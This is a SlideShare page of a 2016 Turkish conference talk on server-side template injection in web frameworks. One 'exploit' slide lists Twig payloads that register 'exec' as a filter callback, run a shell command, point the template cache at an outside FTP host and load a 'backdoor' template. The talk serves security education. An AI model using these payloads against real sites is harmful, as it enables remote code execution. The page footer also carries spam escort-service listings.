SlideShare uma empresa Scribd logo

Web Çatı Şablonlarının Güvenliği (SSTI) - Özgür Web Günleri 2016

Ömer Çıtak
Ömer Çıtak

Web Çatı Şablonlarının Güvenliği (SSTI) - Özgür Web Günleri 2016

Engenharia
1 de 24
Baixar para ler offline
Web Çatı Şablonlarının Güvenliği (SSTI) Ömer Çıtak Özgür Web Teknolojileri Günleri 2016 - www.ozgurwebgunleri.org.tr www.omercitak.com
whoami Security Researcher @ Netsparker Ltd. Developer @ Geri kalan zamanlarda Writer @ Ethical Hacking “Offensive & Defensive” Book Blog: omercitak.com All Social Platform: @Om3rCitak
quesitions 1. Asp.net or PHP?
quesitions 1. Asp.net or PHP? 2. Asp or Laravel?
quesitions 1. Asp.net or PHP? 2. Asp or Laravel? 3. Laravel or Smarty?
quesitions 1. Asp.net or PHP? 2. Asp or Laravel? 3. Laravel or Smarty? 4. Smarty or Asp?
quesitions 1. Asp.net or PHP? 2. Asp or Laravel? 3. Laravel or Smarty? 4. Smarty or Asp?
why using framework?
why using framework? ● Spaghetti Code (functions.php) :P
why using framework? ● Spaghetti Code (functions.php) :P ● Enforcing Coding Standart
why using framework? ● Spaghetti Code (functions.php) :P ● Enforcing Coding Standart ● Pretty URLs
why using framework? ● Spaghetti Code (functions.php) :P ● Enforcing Coding Standart ● Pretty URLs ● Much of the code in less time
why using framework? ● Spaghetti Code (functions.php) :P ● Enforcing Coding Standart ● Pretty URLs ● Much of the code in less time ● MVC or other models
why using framework?
what is the MVC?
what is the MVC?
what is the MVC?
what is the VIEW layer?
what is the VIEW layer? Template Engines; ● Twig ● Smarty ● Blade ● Volt ● Mustache ● etc...
twig ● registerUndefinedFilterCallback(“function_name”) ● getFilter(“filter”) ● setCache(“ftp://omercitak.com:21”) ● loadTemplate(“backdoor”)
exploit ● {{_self.env.registerUndefinedFilterCallback(“exec”)}} ● {{_self.env.getFilter(“ls”)}} ● {{_self.env.setCache(“ftp://omercitak.com:21”)}} ● {{_self.env.loadTemplate(“backdoor”)}}
demo
questions
thanks www.omercitak.com All Social Platform: @Om3rCitak

Recomendados

Bir Şeyi Hacklemek (DEU ACM Bilişim Günleri 2016)
Bir Şeyi Hacklemek (DEU ACM Bilişim Günleri 2016)Bir Şeyi Hacklemek (DEU ACM Bilişim Günleri 2016)
Bir Şeyi Hacklemek (DEU ACM Bilişim Günleri 2016)Ömer Çıtak
 
Laravel ile hızlı ve modern web programlama
Laravel ile hızlı ve modern web programlamaLaravel ile hızlı ve modern web programlama
Laravel ile hızlı ve modern web programlamaÖmer Çıtak
 
OWTG 2016, Web Çatı Şablonlarının Güvenliği (SSTI), Ömer Çıtak
OWTG 2016, Web Çatı Şablonlarının Güvenliği (SSTI), Ömer ÇıtakOWTG 2016, Web Çatı Şablonlarının Güvenliği (SSTI), Ömer Çıtak
OWTG 2016, Web Çatı Şablonlarının Güvenliği (SSTI), Ömer ÇıtakNetsparker Türkiye
 
Tale of Forgotten Disclosure and Lesson learned
Tale of Forgotten Disclosure and Lesson learnedTale of Forgotten Disclosure and Lesson learned
Tale of Forgotten Disclosure and Lesson learnedAnant Shrivastava
 
Code Review: How and When - Tulsa TechFest 2016
Code Review: How and When - Tulsa TechFest 2016Code Review: How and When - Tulsa TechFest 2016
Code Review: How and When - Tulsa TechFest 2016Paul Gower
 
From Twitter App idea to Mashable.com in 24h
From Twitter App idea to Mashable.com in 24hFrom Twitter App idea to Mashable.com in 24h
From Twitter App idea to Mashable.com in 24hXavier Damman
 
When the internet bleeded : RootConf 2014
When the internet bleeded : RootConf 2014When the internet bleeded : RootConf 2014
When the internet bleeded : RootConf 2014Anant Shrivastava
 
NIC 2017 - Attack and detection in Windows Environments
NIC 2017 - Attack and detection in Windows EnvironmentsNIC 2017 - Attack and detection in Windows Environments
NIC 2017 - Attack and detection in Windows EnvironmentsOddvar Moe
 

Recomendados

Bir Şeyi Hacklemek (DEU ACM Bilişim Günleri 2016)
Bir Şeyi Hacklemek (DEU ACM Bilişim Günleri 2016)Bir Şeyi Hacklemek (DEU ACM Bilişim Günleri 2016)
Bir Şeyi Hacklemek (DEU ACM Bilişim Günleri 2016)Ömer Çıtak
 
Laravel ile hızlı ve modern web programlama
Laravel ile hızlı ve modern web programlamaLaravel ile hızlı ve modern web programlama
Laravel ile hızlı ve modern web programlamaÖmer Çıtak
 
OWTG 2016, Web Çatı Şablonlarının Güvenliği (SSTI), Ömer Çıtak
OWTG 2016, Web Çatı Şablonlarının Güvenliği (SSTI), Ömer ÇıtakOWTG 2016, Web Çatı Şablonlarının Güvenliği (SSTI), Ömer Çıtak
OWTG 2016, Web Çatı Şablonlarının Güvenliği (SSTI), Ömer ÇıtakNetsparker Türkiye
 
Tale of Forgotten Disclosure and Lesson learned
Tale of Forgotten Disclosure and Lesson learnedTale of Forgotten Disclosure and Lesson learned
Tale of Forgotten Disclosure and Lesson learnedAnant Shrivastava
 
Code Review: How and When - Tulsa TechFest 2016
Code Review: How and When - Tulsa TechFest 2016Code Review: How and When - Tulsa TechFest 2016
Code Review: How and When - Tulsa TechFest 2016Paul Gower
 
From Twitter App idea to Mashable.com in 24h
From Twitter App idea to Mashable.com in 24hFrom Twitter App idea to Mashable.com in 24h
From Twitter App idea to Mashable.com in 24hXavier Damman
 
When the internet bleeded : RootConf 2014
When the internet bleeded : RootConf 2014When the internet bleeded : RootConf 2014
When the internet bleeded : RootConf 2014Anant Shrivastava
 
NIC 2017 - Attack and detection in Windows Environments
NIC 2017 - Attack and detection in Windows EnvironmentsNIC 2017 - Attack and detection in Windows Environments
NIC 2017 - Attack and detection in Windows EnvironmentsOddvar Moe
 
Web Uygulamalarının Hacklenmesi
Web Uygulamalarının HacklenmesiWeb Uygulamalarının Hacklenmesi
Web Uygulamalarının HacklenmesiÖmer Çıtak
 
Memcache Injection (Hacktrick'15)
Memcache Injection (Hacktrick'15)Memcache Injection (Hacktrick'15)
Memcache Injection (Hacktrick'15)Ömer Çıtak
 
Web Uygulama Güvenliği (Akademik Bilişim 2016)
Web Uygulama Güvenliği (Akademik Bilişim 2016)Web Uygulama Güvenliği (Akademik Bilişim 2016)
Web Uygulama Güvenliği (Akademik Bilişim 2016)Ömer Çıtak
 
Temel Ağ Sızma Testine Giriş Dökümanı
Temel Ağ Sızma Testine Giriş DökümanıTemel Ağ Sızma Testine Giriş Dökümanı
Temel Ağ Sızma Testine Giriş DökümanıAhmet Gürel
 
AngularJS sunumu
AngularJS sunumuAngularJS sunumu
AngularJS sunumuokanozeren
 
Linux101
Linux101Linux101
Linux101Büşra Yenidoğan
 
How to Build Package in Linux Based Systems.
How to Build Package in Linux Based Systems.How to Build Package in Linux Based Systems.
How to Build Package in Linux Based Systems.İbrahim UÇAR
 
Web For Pentester ile Web Uygulama Güvenliğine Giriş
Web For Pentester ile Web Uygulama Güvenliğine GirişWeb For Pentester ile Web Uygulama Güvenliğine Giriş
Web For Pentester ile Web Uygulama Güvenliğine GirişUmut Ergin
 
Web for Pentester 2 ile Web Uygulama Güvenligine Giris
Web for Pentester 2 ile Web Uygulama Güvenligine GirisWeb for Pentester 2 ile Web Uygulama Güvenligine Giris
Web for Pentester 2 ile Web Uygulama Güvenligine GirisUmut Ergin
 
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)Fatih Ozavci
 
Bilgi Sistemleri Güvenliği Metasploit
Bilgi Sistemleri Güvenliği MetasploitBilgi Sistemleri Güvenliği Metasploit
Bilgi Sistemleri Güvenliği Metasploitmsoner
 
Bga some-2016
Bga some-2016Bga some-2016
Bga some-2016MEB Adalar Halk Eğitim Merkezi
 
VoIP Wars: Attack of the Cisco Phones
VoIP Wars: Attack of the Cisco PhonesVoIP Wars: Attack of the Cisco Phones
VoIP Wars: Attack of the Cisco PhonesFatih Ozavci
 
VoIP Wars : Return of the SIP
VoIP Wars : Return of the SIP VoIP Wars : Return of the SIP
VoIP Wars : Return of the SIP Fatih Ozavci
 
Beyazsapkalihackeregitimikitap 140409071714-phpapp02
Beyazsapkalihackeregitimikitap 140409071714-phpapp02Beyazsapkalihackeregitimikitap 140409071714-phpapp02
Beyazsapkalihackeregitimikitap 140409071714-phpapp02Öncü Furkan
 
The Art of VoIP Hacking - Defcon 23 Workshop
The Art of VoIP Hacking - Defcon 23 WorkshopThe Art of VoIP Hacking - Defcon 23 Workshop
The Art of VoIP Hacking - Defcon 23 WorkshopFatih Ozavci
 
Nmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
Nmap101 Eğitim Sunumu - Nmap Kullanım KılavuzuNmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
Nmap101 Eğitim Sunumu - Nmap Kullanım KılavuzuMehmet Caner Köroğlu
 
Mobile Application Penetration Testing
Mobile Application Penetration TestingMobile Application Penetration Testing
Mobile Application Penetration TestingBGA Cyber Security
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15BGA Cyber Security
 
Nmap Kullanım Kitapçığı
Nmap Kullanım KitapçığıNmap Kullanım Kitapçığı
Nmap Kullanım KitapçığıBGA Cyber Security
 
Laravel ile Hızlı ve Modern Web Programlama, Ömer Çıtak
Laravel ile Hızlı ve Modern Web Programlama, Ömer ÇıtakLaravel ile Hızlı ve Modern Web Programlama, Ömer Çıtak
Laravel ile Hızlı ve Modern Web Programlama, Ömer ÇıtakNetsparker Türkiye
 
AI assisted testing using postman and openAI.pdf
AI assisted testing using postman and openAI.pdfAI assisted testing using postman and openAI.pdf
AI assisted testing using postman and openAI.pdfsivaganeshsivakumar1
 

Mais conteúdo relacionado

Destaque

Web Uygulamalarının Hacklenmesi
Web Uygulamalarının HacklenmesiWeb Uygulamalarının Hacklenmesi
Web Uygulamalarının HacklenmesiÖmer Çıtak
 
Memcache Injection (Hacktrick'15)
Memcache Injection (Hacktrick'15)Memcache Injection (Hacktrick'15)
Memcache Injection (Hacktrick'15)Ömer Çıtak
 
Web Uygulama Güvenliği (Akademik Bilişim 2016)
Web Uygulama Güvenliği (Akademik Bilişim 2016)Web Uygulama Güvenliği (Akademik Bilişim 2016)
Web Uygulama Güvenliği (Akademik Bilişim 2016)Ömer Çıtak
 
Temel Ağ Sızma Testine Giriş Dökümanı
Temel Ağ Sızma Testine Giriş DökümanıTemel Ağ Sızma Testine Giriş Dökümanı
Temel Ağ Sızma Testine Giriş DökümanıAhmet Gürel
 
AngularJS sunumu
AngularJS sunumuAngularJS sunumu
AngularJS sunumuokanozeren
 
How to Build Package in Linux Based Systems.
How to Build Package in Linux Based Systems.How to Build Package in Linux Based Systems.
How to Build Package in Linux Based Systems.İbrahim UÇAR
 
Web For Pentester ile Web Uygulama Güvenliğine Giriş
Web For Pentester ile Web Uygulama Güvenliğine GirişWeb For Pentester ile Web Uygulama Güvenliğine Giriş
Web For Pentester ile Web Uygulama Güvenliğine GirişUmut Ergin
 
Web for Pentester 2 ile Web Uygulama Güvenligine Giris
Web for Pentester 2 ile Web Uygulama Güvenligine GirisWeb for Pentester 2 ile Web Uygulama Güvenligine Giris
Web for Pentester 2 ile Web Uygulama Güvenligine GirisUmut Ergin
 
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)Fatih Ozavci
 
Bilgi Sistemleri Güvenliği Metasploit
Bilgi Sistemleri Güvenliği MetasploitBilgi Sistemleri Güvenliği Metasploit
Bilgi Sistemleri Güvenliği Metasploitmsoner
 
VoIP Wars: Attack of the Cisco Phones
VoIP Wars: Attack of the Cisco PhonesVoIP Wars: Attack of the Cisco Phones
VoIP Wars: Attack of the Cisco PhonesFatih Ozavci
 
VoIP Wars : Return of the SIP
VoIP Wars : Return of the SIP VoIP Wars : Return of the SIP
VoIP Wars : Return of the SIP Fatih Ozavci
 
Beyazsapkalihackeregitimikitap 140409071714-phpapp02
Beyazsapkalihackeregitimikitap 140409071714-phpapp02Beyazsapkalihackeregitimikitap 140409071714-phpapp02
Beyazsapkalihackeregitimikitap 140409071714-phpapp02Öncü Furkan
 
The Art of VoIP Hacking - Defcon 23 Workshop
The Art of VoIP Hacking - Defcon 23 WorkshopThe Art of VoIP Hacking - Defcon 23 Workshop
The Art of VoIP Hacking - Defcon 23 WorkshopFatih Ozavci
 
Nmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
Nmap101 Eğitim Sunumu - Nmap Kullanım KılavuzuNmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
Nmap101 Eğitim Sunumu - Nmap Kullanım KılavuzuMehmet Caner Köroğlu
 
Mobile Application Penetration Testing
Mobile Application Penetration TestingMobile Application Penetration Testing
Mobile Application Penetration TestingBGA Cyber Security
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15BGA Cyber Security
 

Destaque (20)

Web Uygulamalarının Hacklenmesi
Web Uygulamalarının HacklenmesiWeb Uygulamalarının Hacklenmesi
Web Uygulamalarının Hacklenmesi
 
Memcache Injection (Hacktrick'15)
Memcache Injection (Hacktrick'15)Memcache Injection (Hacktrick'15)
Memcache Injection (Hacktrick'15)
 
Web Uygulama Güvenliği (Akademik Bilişim 2016)
Web Uygulama Güvenliği (Akademik Bilişim 2016)Web Uygulama Güvenliği (Akademik Bilişim 2016)
Web Uygulama Güvenliği (Akademik Bilişim 2016)
 
Temel Ağ Sızma Testine Giriş Dökümanı
Temel Ağ Sızma Testine Giriş DökümanıTemel Ağ Sızma Testine Giriş Dökümanı
Temel Ağ Sızma Testine Giriş Dökümanı
 
AngularJS sunumu
AngularJS sunumuAngularJS sunumu
AngularJS sunumu
 
Linux101
Linux101Linux101
Linux101
 
How to Build Package in Linux Based Systems.
How to Build Package in Linux Based Systems.How to Build Package in Linux Based Systems.
How to Build Package in Linux Based Systems.
 
Web For Pentester ile Web Uygulama Güvenliğine Giriş
Web For Pentester ile Web Uygulama Güvenliğine GirişWeb For Pentester ile Web Uygulama Güvenliğine Giriş
Web For Pentester ile Web Uygulama Güvenliğine Giriş
 
Web for Pentester 2 ile Web Uygulama Güvenligine Giris
Web for Pentester 2 ile Web Uygulama Güvenligine GirisWeb for Pentester 2 ile Web Uygulama Güvenligine Giris
Web for Pentester 2 ile Web Uygulama Güvenligine Giris
 
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)
 
Bilgi Sistemleri Güvenliği Metasploit
Bilgi Sistemleri Güvenliği MetasploitBilgi Sistemleri Güvenliği Metasploit
Bilgi Sistemleri Güvenliği Metasploit
 
Bga some-2016
Bga some-2016Bga some-2016
Bga some-2016
 
VoIP Wars: Attack of the Cisco Phones
VoIP Wars: Attack of the Cisco PhonesVoIP Wars: Attack of the Cisco Phones
VoIP Wars: Attack of the Cisco Phones
 
VoIP Wars : Return of the SIP
VoIP Wars : Return of the SIP VoIP Wars : Return of the SIP
VoIP Wars : Return of the SIP
 
Beyazsapkalihackeregitimikitap 140409071714-phpapp02
Beyazsapkalihackeregitimikitap 140409071714-phpapp02Beyazsapkalihackeregitimikitap 140409071714-phpapp02
Beyazsapkalihackeregitimikitap 140409071714-phpapp02
 
The Art of VoIP Hacking - Defcon 23 Workshop
The Art of VoIP Hacking - Defcon 23 WorkshopThe Art of VoIP Hacking - Defcon 23 Workshop
The Art of VoIP Hacking - Defcon 23 Workshop
 
Nmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
Nmap101 Eğitim Sunumu - Nmap Kullanım KılavuzuNmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
Nmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
 
Mobile Application Penetration Testing
Mobile Application Penetration TestingMobile Application Penetration Testing
Mobile Application Penetration Testing
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15
 
Nmap Kullanım Kitapçığı
Nmap Kullanım KitapçığıNmap Kullanım Kitapçığı
Nmap Kullanım Kitapçığı
 

Semelhante a Web Çatı Şablonlarının Güvenliği (SSTI) - Özgür Web Günleri 2016

Laravel ile Hızlı ve Modern Web Programlama, Ömer Çıtak
Laravel ile Hızlı ve Modern Web Programlama, Ömer ÇıtakLaravel ile Hızlı ve Modern Web Programlama, Ömer Çıtak
Laravel ile Hızlı ve Modern Web Programlama, Ömer ÇıtakNetsparker Türkiye
 
AI assisted testing using postman and openAI.pdf
AI assisted testing using postman and openAI.pdfAI assisted testing using postman and openAI.pdf
AI assisted testing using postman and openAI.pdfsivaganeshsivakumar1
 
Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Jim Manico
 
2022 APIsecure_Securing APIs with Open Standards
2022 APIsecure_Securing APIs with Open Standards2022 APIsecure_Securing APIs with Open Standards
2022 APIsecure_Securing APIs with Open StandardsAPIsecure_ Official
 
apidays New York 2023 - API First Paradigms That Help Secure Your APIs, Raj U...
apidays New York 2023 - API First Paradigms That Help Secure Your APIs, Raj U...apidays New York 2023 - API First Paradigms That Help Secure Your APIs, Raj U...
apidays New York 2023 - API First Paradigms That Help Secure Your APIs, Raj U...apidays
 
WDI 2021 - Pierwszy duży projekt w Pythonie i Selenium - Katarzyna Javaheri-S...
WDI 2021 - Pierwszy duży projekt w Pythonie i Selenium - Katarzyna Javaheri-S...WDI 2021 - Pierwszy duży projekt w Pythonie i Selenium - Katarzyna Javaheri-S...
WDI 2021 - Pierwszy duży projekt w Pythonie i Selenium - Katarzyna Javaheri-S...Katarzyna Javaheri-Szpak
 
ANOTHER BRICK OFF THE WALL: DECONSTRUCTING WEB APPLICATION FIREWALLS USING AU...
ANOTHER BRICK OFF THE WALL: DECONSTRUCTING WEB APPLICATION FIREWALLS USING AU...ANOTHER BRICK OFF THE WALL: DECONSTRUCTING WEB APPLICATION FIREWALLS USING AU...
ANOTHER BRICK OFF THE WALL: DECONSTRUCTING WEB APPLICATION FIREWALLS USING AU...Ioannis Stais
 
INTERFACE by apidays 2023 - API Design Governance, Nauman Ali, Stoplight
INTERFACE by apidays 2023 - API Design Governance, Nauman Ali, StoplightINTERFACE by apidays 2023 - API Design Governance, Nauman Ali, Stoplight
INTERFACE by apidays 2023 - API Design Governance, Nauman Ali, Stoplightapidays
 
How to Use OWASP Security Logging
How to Use OWASP Security LoggingHow to Use OWASP Security Logging
How to Use OWASP Security LoggingMilton Smith
 
Unleashing the Power of Automated Refactoring with JDT
Unleashing the Power of Automated Refactoring with JDTUnleashing the Power of Automated Refactoring with JDT
Unleashing the Power of Automated Refactoring with JDTNaresh Jain
 
openQA Hoverboard - Open-source Question Answering Framework
openQA Hoverboard - Open-source Question Answering FrameworkopenQA Hoverboard - Open-source Question Answering Framework
openQA Hoverboard - Open-source Question Answering FrameworkEdgard Marx
 
Security as Code: A DevSecOps Approach
Security as Code: A DevSecOps ApproachSecurity as Code: A DevSecOps Approach
Security as Code: A DevSecOps ApproachVMware Tanzu
 
Introduction to Python for new beginner
Introduction to Python for new beginnerIntroduction to Python for new beginner
Introduction to Python for new beginnerBurasakorn Sabyeying
 
Developing Brilliant and Powerful APIs in Ruby & Python
Developing Brilliant and Powerful APIs in Ruby & PythonDeveloping Brilliant and Powerful APIs in Ruby & Python
Developing Brilliant and Powerful APIs in Ruby & PythonSmartBear
 

Semelhante a Web Çatı Şablonlarının Güvenliği (SSTI) - Özgür Web Günleri 2016 (20)

Laravel ile Hızlı ve Modern Web Programlama, Ömer Çıtak
Laravel ile Hızlı ve Modern Web Programlama, Ömer ÇıtakLaravel ile Hızlı ve Modern Web Programlama, Ömer Çıtak
Laravel ile Hızlı ve Modern Web Programlama, Ömer Çıtak
 
AI assisted testing using postman and openAI.pdf
AI assisted testing using postman and openAI.pdfAI assisted testing using postman and openAI.pdf
AI assisted testing using postman and openAI.pdf
 
Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5
 
2022 APIsecure_Securing APIs with Open Standards
2022 APIsecure_Securing APIs with Open Standards2022 APIsecure_Securing APIs with Open Standards
2022 APIsecure_Securing APIs with Open Standards
 
apidays New York 2023 - API First Paradigms That Help Secure Your APIs, Raj U...
apidays New York 2023 - API First Paradigms That Help Secure Your APIs, Raj U...apidays New York 2023 - API First Paradigms That Help Secure Your APIs, Raj U...
apidays New York 2023 - API First Paradigms That Help Secure Your APIs, Raj U...
 
2 . web app s canners
2 . web app s canners2 . web app s canners
2 . web app s canners
 
OISF - AppSec Presentation
OISF - AppSec PresentationOISF - AppSec Presentation
OISF - AppSec Presentation
 
WDI 2021 - Pierwszy duży projekt w Pythonie i Selenium - Katarzyna Javaheri-S...
WDI 2021 - Pierwszy duży projekt w Pythonie i Selenium - Katarzyna Javaheri-S...WDI 2021 - Pierwszy duży projekt w Pythonie i Selenium - Katarzyna Javaheri-S...
WDI 2021 - Pierwszy duży projekt w Pythonie i Selenium - Katarzyna Javaheri-S...
 
Developer < eat love code >
Developer < eat love code >Developer < eat love code >
Developer < eat love code >
 
How to be a Developer
How to be a DeveloperHow to be a Developer
How to be a Developer
 
ANOTHER BRICK OFF THE WALL: DECONSTRUCTING WEB APPLICATION FIREWALLS USING AU...
ANOTHER BRICK OFF THE WALL: DECONSTRUCTING WEB APPLICATION FIREWALLS USING AU...ANOTHER BRICK OFF THE WALL: DECONSTRUCTING WEB APPLICATION FIREWALLS USING AU...
ANOTHER BRICK OFF THE WALL: DECONSTRUCTING WEB APPLICATION FIREWALLS USING AU...
 
INTERFACE by apidays 2023 - API Design Governance, Nauman Ali, Stoplight
INTERFACE by apidays 2023 - API Design Governance, Nauman Ali, StoplightINTERFACE by apidays 2023 - API Design Governance, Nauman Ali, Stoplight
INTERFACE by apidays 2023 - API Design Governance, Nauman Ali, Stoplight
 
How to Use OWASP Security Logging
How to Use OWASP Security LoggingHow to Use OWASP Security Logging
How to Use OWASP Security Logging
 
Unleashing the Power of Automated Refactoring with JDT
Unleashing the Power of Automated Refactoring with JDTUnleashing the Power of Automated Refactoring with JDT
Unleashing the Power of Automated Refactoring with JDT
 
openQA Hoverboard - Open-source Question Answering Framework
openQA Hoverboard - Open-source Question Answering FrameworkopenQA Hoverboard - Open-source Question Answering Framework
openQA Hoverboard - Open-source Question Answering Framework
 
Clojure at ardoq
Clojure at ardoqClojure at ardoq
Clojure at ardoq
 
Security as Code: A DevSecOps Approach
Security as Code: A DevSecOps ApproachSecurity as Code: A DevSecOps Approach
Security as Code: A DevSecOps Approach
 
Introduction to Python for new beginner
Introduction to Python for new beginnerIntroduction to Python for new beginner
Introduction to Python for new beginner
 
Developing Brilliant and Powerful APIs in Ruby & Python
Developing Brilliant and Powerful APIs in Ruby & PythonDeveloping Brilliant and Powerful APIs in Ruby & Python
Developing Brilliant and Powerful APIs in Ruby & Python
 
ISC2: AppSec & OWASP Primer
ISC2: AppSec & OWASP PrimerISC2: AppSec & OWASP Primer
ISC2: AppSec & OWASP Primer
 

Mais de Ömer Çıtak

Cyber Security's Good Sectors & Bad Sectors
Cyber Security's Good Sectors & Bad SectorsCyber Security's Good Sectors & Bad Sectors
Cyber Security's Good Sectors & Bad SectorsÖmer Çıtak
 
Günahı ile Sevabı ile Laravel
Günahı ile Sevabı ile LaravelGünahı ile Sevabı ile Laravel
Günahı ile Sevabı ile LaravelÖmer Çıtak
 
Out-of-band SQL Injection Attacks (#cypsec'17)
Out-of-band SQL Injection Attacks (#cypsec'17)Out-of-band SQL Injection Attacks (#cypsec'17)
Out-of-band SQL Injection Attacks (#cypsec'17)Ömer Çıtak
 
Data manipulation Will hackers rule the world?
Data manipulation Will hackers rule the world?Data manipulation Will hackers rule the world?
Data manipulation Will hackers rule the world?Ömer Çıtak
 
Out-of-band SQL Injection Attacks (#istsec)
Out-of-band SQL Injection Attacks (#istsec)Out-of-band SQL Injection Attacks (#istsec)
Out-of-band SQL Injection Attacks (#istsec)Ömer Çıtak
 
How to Make Web RTS Game?
How to Make Web RTS Game?How to Make Web RTS Game?
How to Make Web RTS Game?Ömer Çıtak
 
Out-of-band Sql Injection Attacks (#hacktrickconf)
Out-of-band Sql Injection Attacks (#hacktrickconf)Out-of-band Sql Injection Attacks (#hacktrickconf)
Out-of-band Sql Injection Attacks (#hacktrickconf)Ömer Çıtak
 

Mais de Ömer Çıtak (8)

osquery injection
osquery injectionosquery injection
osquery injection
 
Cyber Security's Good Sectors & Bad Sectors
Cyber Security's Good Sectors & Bad SectorsCyber Security's Good Sectors & Bad Sectors
Cyber Security's Good Sectors & Bad Sectors
 
Günahı ile Sevabı ile Laravel
Günahı ile Sevabı ile LaravelGünahı ile Sevabı ile Laravel
Günahı ile Sevabı ile Laravel
 
Out-of-band SQL Injection Attacks (#cypsec'17)
Out-of-band SQL Injection Attacks (#cypsec'17)Out-of-band SQL Injection Attacks (#cypsec'17)
Out-of-band SQL Injection Attacks (#cypsec'17)
 
Data manipulation Will hackers rule the world?
Data manipulation Will hackers rule the world?Data manipulation Will hackers rule the world?
Data manipulation Will hackers rule the world?
 
Out-of-band SQL Injection Attacks (#istsec)
Out-of-band SQL Injection Attacks (#istsec)Out-of-band SQL Injection Attacks (#istsec)
Out-of-band SQL Injection Attacks (#istsec)
 
How to Make Web RTS Game?
How to Make Web RTS Game?How to Make Web RTS Game?
How to Make Web RTS Game?
 
Out-of-band Sql Injection Attacks (#hacktrickconf)
Out-of-band Sql Injection Attacks (#hacktrickconf)Out-of-band Sql Injection Attacks (#hacktrickconf)
Out-of-band Sql Injection Attacks (#hacktrickconf)
 

Último

AKTU Computer Networks notes --- Unit 3.pdf
AKTU Computer Networks notes --- Unit 3.pdfAKTU Computer Networks notes --- Unit 3.pdf
AKTU Computer Networks notes --- Unit 3.pdfankushspencer015
 
Processing & Properties of Floor and Wall Tiles.pptx
Processing & Properties of Floor and Wall Tiles.pptxProcessing & Properties of Floor and Wall Tiles.pptx
Processing & Properties of Floor and Wall Tiles.pptxpranjaldaimarysona
 
Sheet Pile Wall Design and Construction: A Practical Guide for Civil Engineer...
Sheet Pile Wall Design and Construction: A Practical Guide for Civil Engineer...Sheet Pile Wall Design and Construction: A Practical Guide for Civil Engineer...
Sheet Pile Wall Design and Construction: A Practical Guide for Civil Engineer...Dr.Costas Sachpazis
 
Introduction to Multiple Access Protocol.pptx
Introduction to Multiple Access Protocol.pptxIntroduction to Multiple Access Protocol.pptx
Introduction to Multiple Access Protocol.pptxupamatechverse
 
VIP Call Girls Service Kondapur Hyderabad Call +91-8250192130
VIP Call Girls Service Kondapur Hyderabad Call +91-8250192130VIP Call Girls Service Kondapur Hyderabad Call +91-8250192130
VIP Call Girls Service Kondapur Hyderabad Call +91-8250192130Suhani Kapoor
 
SPICE PARK APR2024 ( 6,793 SPICE Models )
SPICE PARK APR2024 ( 6,793 SPICE Models )SPICE PARK APR2024 ( 6,793 SPICE Models )
SPICE PARK APR2024 ( 6,793 SPICE Models )Tsuyoshi Horigome
 
Call Girls Pimpri Chinchwad Call Me 7737669865 Budget Friendly No Advance Boo...
Call Girls Pimpri Chinchwad Call Me 7737669865 Budget Friendly No Advance Boo...Call Girls Pimpri Chinchwad Call Me 7737669865 Budget Friendly No Advance Boo...
Call Girls Pimpri Chinchwad Call Me 7737669865 Budget Friendly No Advance Boo...roncy bisnoi
 
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...Call Girls in Nagpur High Profile
 
College Call Girls Nashik Nehal 7001305949 Independent Escort Service Nashik
College Call Girls Nashik Nehal 7001305949 Independent Escort Service NashikCollege Call Girls Nashik Nehal 7001305949 Independent Escort Service Nashik
College Call Girls Nashik Nehal 7001305949 Independent Escort Service NashikCall Girls in Nagpur High Profile
 
Introduction and different types of Ethernet.pptx
Introduction and different types of Ethernet.pptxIntroduction and different types of Ethernet.pptx
Introduction and different types of Ethernet.pptxupamatechverse
 
Coefficient of Thermal Expansion and their Importance.pptx
Coefficient of Thermal Expansion and their Importance.pptxCoefficient of Thermal Expansion and their Importance.pptx
Coefficient of Thermal Expansion and their Importance.pptxAsutosh Ranjan
 
Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...
Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...
